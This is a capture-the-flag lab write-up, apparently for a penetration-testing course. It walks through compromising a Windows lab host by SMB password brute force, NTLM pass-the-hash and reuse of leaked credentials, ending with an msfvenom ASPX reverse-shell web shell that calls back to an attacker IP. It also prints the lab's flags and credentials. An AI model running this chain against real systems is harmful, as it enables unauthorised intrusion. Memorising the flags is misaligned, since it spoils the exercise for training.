Skip to content

Penetration Testing Exploitation CTF 2

Overview

This lab focuses on exploiting a Windows target machine. By identifying services, analyzing misconfigurations, and leveraging discovered credentials, we uncover and capture the flags. Tasks involve exploiting SMB misconfigurations, utilizing NTLM hashes, and gaining system access.

The target machine is accessible at target.ine.local. The following flags need to be captured:

  1. Flag 1: SMB user tom hasn't changed his password in a long time.
  2. Flag 2: Using the NTLM hash list discovered earlier, compromise SMB user nancy.
  3. Flag 3: The hint found in the previous challenge might be useful.
  4. Flag 4: Compromise the target machine and retrieve C:\flag4.txt.

A useful wordlist:
/usr/share/wordlists/metasploit/unix_passwords.txt

Writeup

Flag 1: Exploiting SMB User tom

Step 1: Port Scanning

First, we perform an Nmap scan to identify open ports and services:

nmap -p- --min-rate=10000 target.ine.local

Findings: - FTP (21) - HTTP (80) - SMB (445) - RDP (3389) - Multiple RPC ports (135, 49152-49191)

Step 2: SMB Enumeration

The challenge hints that user tom has a weak password. We use crackmapexec to brute-force his credentials:

crackmapexec smb target.ine.local -u tom -p /usr/share/wordlists/metasploit/unix_passwords.txt

Discovered Credentials:
tom:felipe

Step 3: Accessing SMB Shares

Using the credentials, we list available shares:

smbclient -U tom -L \\\\target.ine.local

Accessible Shares:
- HRDocuments
- ITResources

We access HRDocuments and retrieve flag1.txt:

smbclient -U tom \\\\target.ine.local\\HRDocuments
> get flag1.txt
Flag 1

7a4d0be4d00d4278bcfef976d32205e6

Flag 2: Compromising SMB User nancy with NTLM Hashes

Step 1: Extracting NTLM Hashes

Inside HRDocuments, we find leaked-hashes.txt. We extract the hashes:

cat leaked-hashes.txt | cut -d ":" -f 2 > hashes.txt

Step 2: Cracking the Hash

Using Metasploit’s smb_login, we test the hashes against user nancy:

msf6 > use auxiliary/scanner/smb/smb_login
msf6 > set SMBUser nancy
msf6 > set PASS_FILE hashes.txt
msf6 > set RHOSTS target.ine.local
msf6 > run

Successful Login:
nancy:b3ddea4b4b957f3e037af75cfe5317ad

Step 3: Accessing ITResources

We log in via SMB and retrieve flag2.txt:

smbclient -U nancy \\\\target.ine.local\\ITResources
> get flag2.txt
Flag 2

[Flag 2 Value]

Flag 3: Leveraging the Hint

Step 1: Analyzing the Hint

Inside ITResources, we find hint.txt:

Who knows, these creds might come handy! ---> david:omnitrix_9901

Step 2: FTP Access

We use the credentials to log in via FTP:

ftp target.ine.local
Name: david
Password: omnitrix_9901
> ls
> get flag3.txt
Flag 3

192e2217da974f89ae694e411bc29179

Flag 4: System Compromise & Flag Extraction

Step 1: Uploading a Web Shell

Since FTP uploads to the web directory (inetpub), we generate a malicious .aspx shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.42.2 LPORT=4444 -f aspx > shell.aspx
ftp> put shell.aspx

Step 2: Reverse Shell Execution

We set up a Metasploit listener:

msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set LHOST eth1
msf6 > run

Step 3: Retrieving the Final Flag

After gaining a shell, we navigate to C:\ and download flag4.txt:

meterpreter > cd C:\\
meterpreter > download flag4.txt
Flag 4

c7f0a853e2e2499b8bd596e70480fefc

This exercise demonstrated SMB exploitation, hash cracking, credential reuse, and web shell uploads for system compromise.